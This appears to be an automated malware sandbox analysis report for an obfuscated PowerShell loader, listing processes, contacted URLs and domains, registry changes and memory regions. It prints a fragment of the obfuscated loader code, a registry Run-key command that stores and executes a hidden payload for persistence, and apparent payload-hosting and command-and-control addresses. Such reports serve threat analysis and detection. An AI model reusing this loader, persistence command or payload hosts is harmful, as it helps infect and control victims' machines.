Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres
' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL
AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse
(Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt
O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e
ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX
AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne
Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd(
B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l
L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl
MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ
/d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110%
-w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
|
|
|
|
C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
|
"C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe"
|
|
|
|
C:\Windows\SysWOW64\relog.exe
|
"C:\Windows\SysWOW64\relog.exe"
|
|
|
|
C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
|
"C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\srdelayed.exe
|
"C:\Windows\SysWOW64\srdelayed.exe"
|
There are 20 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.atlpicsstudios.com/pbzm/
|
3.33.130.190
|
|
|
|
http://www.katasoo.com/7qad/
|
188.114.96.3
|
|
|
|
http://www.shabygreen.top/r9e8/
|
203.161.41.205
|
|
|
|
http://www.martinminorgroup.com/oyqt/
|
34.149.87.45
|
|
|
|
http://www.411divorce.com/hxac/
|
5.78.41.174
|
|
|
|
http://www.vendasnaweb1.com/jk4m/
|
162.241.2.92
|
|
|
|
http://www.gtprivatewealth.com/4d31/
|
3.33.130.190
|
|
|
|
http://cpanel-adminhost.com/Stevns179.mix
|
193.25.216.165
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gp(
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
https://avocaldoperu.com/
|
unknown
|
||
|
http://geoplugin.net/json.gpg
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://geoplugin.net/json.gp/
|
unknown
|
||
|
https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.png
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://avocaldoperu.com/Jouse4.png
|
104.21.62.202
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://avocaldoperu.com
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpn.net/json.gp
|
unknown
|
||
|
https://avocaldoperu.com/Jouse1.png
|
104.21.62.202
|
||
|
http://cpanel-adminhost.com/wWdnBiepyw166.bin
|
193.25.216.165
|
||
|
https://aka.ms/pscore6lBdq
|
unknown
|
||
|
https://avocaldoperu.com
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://avocaldoperuone.com/Jouse4.png
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://geoplugin.net/json.gpX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.openhandedvision.com/ehr0/
|
142.250.186.147
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 34 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ctorq.net
|
3.33.130.190
|
|
|
|
kera333.org
|
64.46.102.70
|
|
|
|
gtprivatewealth.com
|
3.33.130.190
|
|
|
|
td-ccm-neg-87-45.wixdns.net
|
34.149.87.45
|
|
|
|
vendasnaweb1.com
|
162.241.2.92
|
|
|
|
www.shabygreen.top
|
203.161.41.205
|
|
|
|
atlpicsstudios.com
|
3.33.130.190
|
|
|
|
411divorce.com
|
5.78.41.174
|
|
|
|
www.katasoo.com
|
188.114.96.3
|
|
|
|
iwarsut775laudrye2.duckdns.org
|
172.111.137.132
|
|
|
|
www.openhandedvision.com
|
unknown
|
|
|
|
www.vendasnaweb1.com
|
unknown
|
|
|
|
www.411divorce.com
|
unknown
|
|
|
|
www.ctorq.net
|
unknown
|
|
|
|
www.atlpicsstudios.com
|
unknown
|
|
|
|
www.martinminorgroup.com
|
unknown
|
|
|
|
www.kera333.org
|
unknown
|
|
|
|
www.gtprivatewealth.com
|
unknown
|
|
|
|
avocaldoperu.com
|
104.21.62.202
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
cpanel-adminhost.com
|
193.25.216.165
|
||
|
ghs.googlehosted.com
|
142.250.186.147
|
There are 12 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
5.78.41.174
|
411divorce.com
|
Iran (ISLAMIC Republic Of)
|
|
|
|
188.114.96.3
|
www.katasoo.com
|
European Union
|
|
|
|
203.161.41.205
|
www.shabygreen.top
|
Malaysia
|
|
|
|
172.111.137.132
|
iwarsut775laudrye2.duckdns.org
|
United States
|
|
|
|
34.149.87.45
|
td-ccm-neg-87-45.wixdns.net
|
United States
|
|
|
|
162.241.2.92
|
vendasnaweb1.com
|
United States
|
|
|
|
3.33.130.190
|
ctorq.net
|
United States
|
|
|
|
104.21.62.202
|
avocaldoperu.com
|
United States
|
||
|
193.25.216.165
|
cpanel-adminhost.com
|
Germany
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
142.250.186.147
|
ghs.googlehosted.com
|
United States
|
There are 1 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Almindeligheden
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Bilateralities
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Neglective
|
Tveboplantes
|
||
|
HKEY_CURRENT_USER\Environment
|
outoven
|
||
|
HKEY_CURRENT_USER\SOFTWARE\shietgtst-TYE3VH
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\shietgtst-TYE3VH
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\shietgtst-TYE3VH
|
time
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\sttyskers
|
talevant
|
||
|
HKEY_CURRENT_USER\Environment
|
Arrestationernes110
|
There are 31 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8740000
|
direct allocation
|
page execute and read and write
|
|
|
|
59E7000
|
trusted library allocation
|
page read and write
|
|
|
|
5634000
|
trusted library allocation
|
page read and write
|
|
|
|
3500000
|
trusted library allocation
|
page read and write
|
|
|
|
20B6C824000
|
trusted library allocation
|
page read and write
|
|
|
|
4843000
|
remote allocation
|
page execute and read and write
|
|
|
|
85A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
A283000
|
direct allocation
|
page execute and read and write
|
|
|
|
5B55000
|
trusted library allocation
|
page read and write
|
|
|
|
3240000
|
unclassified section
|
page execute and read and write
|
|
|
|
2F20000
|
system
|
page execute and read and write
|
|
|
|
12D0000
|
system
|
page execute and read and write
|
|
|
|
33B0000
|
trusted library allocation
|
page read and write
|
|
|
|
C162000
|
direct allocation
|
page execute and read and write
|
|
|
|
D40000
|
unkown
|
page readonly
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B5C340000
|
trusted library allocation
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
51A1000
|
heap
|
page read and write
|
||
|
42DF000
|
stack
|
page read and write
|
||
|
8770000
|
direct allocation
|
page read and write
|
||
|
218EF000
|
stack
|
page read and write
|
||
|
3255000
|
heap
|
page read and write
|
||
|
BBF000
|
heap
|
page read and write
|
||
|
5F9F000
|
heap
|
page read and write
|
||
|
5243000
|
remote allocation
|
page execute and read and write
|
||
|
492E000
|
stack
|
page read and write
|
||
|
2121E000
|
stack
|
page read and write
|
||
|
AFA000
|
heap
|
page read and write
|
||
|
21BD3000
|
heap
|
page read and write
|
||
|
83D000
|
heap
|
page read and write
|
||
|
2ACC000
|
stack
|
page read and write
|
||
|
20B748C0000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
23F1A000
|
heap
|
page read and write
|
||
|
4B0A000
|
heap
|
page read and write
|
||
|
7342000
|
heap
|
page read and write
|
||
|
5E70000
|
direct allocation
|
page read and write
|
||
|
8445000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
1B9F8180000
|
trusted library allocation
|
page read and write
|
||
|
5DE0000
|
direct allocation
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
45D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CB0000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
239EF000
|
stack
|
page read and write
|
||
|
2125E000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3591000
|
heap
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
1B9F68E3000
|
heap
|
page read and write
|
||
|
5FA0000
|
heap
|
page read and write
|
||
|
4CE2000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2F1D000
|
stack
|
page read and write
|
||
|
229A0000
|
unclassified section
|
page execute and read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
2D1373E000
|
stack
|
page read and write
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
2F4E000
|
unkown
|
page read and write
|
||
|
2F12000
|
trusted library allocation
|
page read and write
|
||
|
22D000
|
stack
|
page read and write
|
||
|
AC83000
|
direct allocation
|
page execute and read and write
|
||
|
20B5AC60000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
BCC000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
35FA000
|
heap
|
page read and write
|
||
|
1180000
|
unkown
|
page readonly
|
||
|
225000
|
unkown
|
page read and write
|
||
|
14B8000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
1494000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
4C3A000
|
heap
|
page read and write
|
||
|
20B5CFD7000
|
trusted library allocation
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
5D3F000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
1B9F68B9000
|
heap
|
page read and write
|
||
|
3657000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
590C000
|
trusted library allocation
|
page read and write
|
||
|
105A000
|
stack
|
page read and write
|
||
|
23F9A000
|
heap
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
889C000
|
stack
|
page read and write
|
||
|
211000
|
unkown
|
page execute read
|
||
|
20B5CFB8000
|
trusted library allocation
|
page read and write
|
||
|
23FB1000
|
heap
|
page read and write
|
||
|
4DAC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
2FBF000
|
stack
|
page read and write
|
||
|
BBF000
|
heap
|
page read and write
|
||
|
443D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4680000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D138BB000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B74993000
|
heap
|
page read and write
|
||
|
21660000
|
direct allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
230A0000
|
direct allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
368E000
|
heap
|
page read and write
|
||
|
4D45000
|
trusted library allocation
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2186C000
|
stack
|
page read and write
|
||
|
2BAC000
|
heap
|
page read and write
|
||
|
63F000
|
stack
|
page read and write
|
||
|
6852000
|
remote allocation
|
page execute and read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
6FEF000
|
stack
|
page read and write
|
||
|
348E000
|
stack
|
page read and write
|
||
|
6F80000
|
heap
|
page read and write
|
||
|
4AF3000
|
heap
|
page read and write
|
||
|
20B5CFA2000
|
trusted library allocation
|
page read and write
|
||
|
237F0000
|
direct allocation
|
page read and write
|
||
|
2A868FA0000
|
heap
|
page read and write
|
||
|
7FFD9B5ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
53E6000
|
heap
|
page read and write
|
||
|
7F30000
|
trusted library allocation
|
page read and write
|
||
|
7413000
|
heap
|
page read and write
|
||
|
5D80000
|
direct allocation
|
page read and write
|
||
|
872E000
|
stack
|
page read and write
|
||
|
20B5AA90000
|
heap
|
page read and write
|
||
|
7521000
|
heap
|
page read and write
|
||
|
20B5E6E1000
|
trusted library allocation
|
page read and write
|
||
|
5F63000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
363D000
|
heap
|
page read and write
|
||
|
45E0000
|
trusted library allocation
|
page read and write
|
||
|
2F30000
|
trusted library allocation
|
page read and write
|
||
|
BB9000
|
heap
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4B21000
|
heap
|
page read and write
|
||
|
23EA0000
|
heap
|
page read and write
|
||
|
44A8000
|
trusted library allocation
|
page read and write
|
||
|
74C9000
|
heap
|
page read and write
|
||
|
BE5000
|
heap
|
page read and write
|
||
|
4AFF000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
2A868FCB000
|
heap
|
page read and write
|
||
|
14B8000
|
heap
|
page read and write
|
||
|
81D0000
|
heap
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
D30000
|
unkown
|
page readonly
|
||
|
3623000
|
heap
|
page read and write
|
||
|
B5E000
|
heap
|
page read and write
|
||
|
24241000
|
heap
|
page read and write
|
||
|
3022000
|
unkown
|
page read and write
|
||
|
960000
|
unkown
|
page readonly
|
||
|
3651000
|
heap
|
page read and write
|
||
|
387E000
|
stack
|
page read and write
|
||
|
2A868F00000
|
heap
|
page read and write
|
||
|
23F19000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
B57000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7232000
|
heap
|
page read and write
|
||
|
2EDD000
|
stack
|
page read and write
|
||
|
21E000
|
unkown
|
page readonly
|
||
|
4C5F000
|
heap
|
page read and write
|
||
|
2EFD000
|
stack
|
page read and write
|
||
|
7FFD9B700000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D50000
|
heap
|
page readonly
|
||
|
23F9C000
|
heap
|
page read and write
|
||
|
4E0C000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
80D0000
|
trusted library allocation
|
page read and write
|
||
|
4C55000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
51EF000
|
stack
|
page read and write
|
||
|
6DD0000
|
direct allocation
|
page read and write
|
||
|
571F000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3E02000
|
unclassified section
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
364E000
|
heap
|
page read and write
|
||
|
5F5E000
|
heap
|
page read and write
|
||
|
1B9F68DC000
|
heap
|
page read and write
|
||
|
DC0000
|
unkown
|
page readonly
|
||
|
362B000
|
heap
|
page read and write
|
||
|
4AEF000
|
stack
|
page read and write
|
||
|
3641000
|
heap
|
page read and write
|
||
|
23CD000
|
stack
|
page read and write
|
||
|
20B5CFB0000
|
trusted library allocation
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20B5A8C0000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
23D70000
|
direct allocation
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
57AF000
|
stack
|
page read and write
|
||
|
4740000
|
heap
|
page execute and read and write
|
||
|
3390000
|
trusted library allocation
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
6CE0000
|
heap
|
page read and write
|
||
|
7EE60000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F6FFD000
|
stack
|
page read and write
|
||
|
7330000
|
heap
|
page execute and read and write
|
||
|
88DC000
|
stack
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
435E000
|
stack
|
page read and write
|
||
|
2874000
|
heap
|
page read and write
|
||
|
20B5A9A0000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
78C000
|
stack
|
page read and write
|
||
|
6F7C000
|
stack
|
page read and write
|
||
|
4D0A000
|
trusted library allocation
|
page read and write
|
||
|
3E43000
|
remote allocation
|
page execute and read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
3588000
|
heap
|
page read and write
|
||
|
39F0000
|
direct allocation
|
page execute and read and write
|
||
|
321B000
|
heap
|
page read and write
|
||
|
55C1000
|
trusted library allocation
|
page read and write
|
||
|
4CA5000
|
heap
|
page read and write
|
||
|
2FB2000
|
stack
|
page read and write
|
||
|
23F9E000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7366000
|
heap
|
page read and write
|
||
|
6BF0000
|
direct allocation
|
page read and write
|
||
|
3720000
|
trusted library allocation
|
page execute and read and write
|
||
|
35F0000
|
heap
|
page read and write
|
||
|
6E48000
|
trusted library allocation
|
page read and write
|
||
|
3645000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
8100000
|
direct allocation
|
page read and write
|
||
|
28C0000
|
unkown
|
page read and write
|
||
|
3638000
|
heap
|
page read and write
|
||
|
9F9000
|
heap
|
page read and write
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
D6591FF000
|
unkown
|
page read and write
|
||
|
2A06000
|
heap
|
page read and write
|
||
|
3F90000
|
unkown
|
page execute and read and write
|
||
|
45D4000
|
trusted library allocation
|
page read and write
|
||
|
4B0A000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
2F8C000
|
stack
|
page read and write
|
||
|
227000
|
unkown
|
page readonly
|
||
|
658000
|
heap
|
page read and write
|
||
|
745B000
|
heap
|
page read and write
|
||
|
81DD000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
DC0000
|
unkown
|
page read and write
|
||
|
4CB4000
|
heap
|
page read and write
|
||
|
277E000
|
unkown
|
page read and write
|
||
|
363D000
|
heap
|
page read and write
|
||
|
35D5000
|
heap
|
page read and write
|
||
|
825C000
|
stack
|
page read and write
|
||
|
81A0000
|
direct allocation
|
page read and write
|
||
|
84D0000
|
heap
|
page read and write
|
||
|
304F000
|
unkown
|
page read and write
|
||
|
8453000
|
heap
|
page read and write
|
||
|
5F9B000
|
heap
|
page read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
210000
|
unkown
|
page readonly
|
||
|
6EEB000
|
stack
|
page read and write
|
||
|
817E000
|
stack
|
page read and write
|
||
|
4CA5000
|
heap
|
page read and write
|
||
|
59D9000
|
trusted library allocation
|
page read and write
|
||
|
8150000
|
direct allocation
|
page read and write
|
||
|
20B5E06B000
|
trusted library allocation
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
5CDE000
|
stack
|
page read and write
|
||
|
752E000
|
heap
|
page read and write
|
||
|
2AA0000
|
unkown
|
page readonly
|
||
|
3370000
|
heap
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
4F02000
|
unclassified section
|
page read and write
|
||
|
1B9F85BE000
|
trusted library allocation
|
page read and write
|
||
|
21340000
|
heap
|
page read and write
|
||
|
20B5D003000
|
trusted library allocation
|
page read and write
|
||
|
2F9B000
|
stack
|
page read and write
|
||
|
4CAD000
|
heap
|
page read and write
|
||
|
270E000
|
unkown
|
page read and write
|
||
|
365D000
|
heap
|
page read and write
|
||
|
2F7FFE000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B747BE000
|
heap
|
page read and write
|
||
|
361E000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
